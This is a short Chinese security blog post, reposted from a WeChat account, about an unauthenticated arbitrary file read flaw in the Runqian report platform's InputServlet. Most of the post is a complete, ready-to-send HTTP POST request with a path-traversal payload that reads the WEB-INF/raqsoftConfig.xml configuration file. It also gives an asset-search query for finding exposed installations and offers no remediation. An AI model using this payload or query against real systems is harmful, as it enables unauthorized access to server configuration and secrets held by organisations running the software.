润乾报表平台InputServlet存在任意文件读取漏洞

admin

102620
文章

87
评论

2024年4月18日08:17:57评论18 views字数 408阅读1分21秒阅读模式

漏洞描述

润乾报表平台InputServlet存在任意文件读取漏洞，未经身份攻击者可通过该漏洞读取系统内部配置文件。

资产测绘

HUNTER：app.name="润乾报表平台"

漏洞复现

POST /InputServlet?action=13 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
Content-Type: application/x-www-form-urlencoded
Connection: close
 
file=%2F%5C..%5C%5C..%5C%5CWEB-INF%5C%5CraqsoftConfig.xml&upFileName=web.config

原文始发于微信公众号（漏洞文库）：【漏洞复现】润乾报表平台InputServlet存在任意文件读取漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

润乾报表平台InputServlet存在任意文件读取漏洞

漏洞描述

漏洞复现

MajorDoMo 未授权RCE漏洞

QVD-2024-15263禅道项目管理系统身份认证绕过

某直辖市HW三甲医院公众号越权漏洞泄露8W+个人信息

禅道项目管理系统身份认证绕过

Pkpmbs建设工程质量监督系统FileUpOrDown.ashx存在文件上传漏洞

CVE-2024-24488

用友NC grouptemplet 任意文件上传漏洞

瑞友天翼虚拟化系统-SQL注入-ConsoleExternalApi

用友一波POC/EXP

禅道 zentaosid 身份认证绕过漏洞

发表评论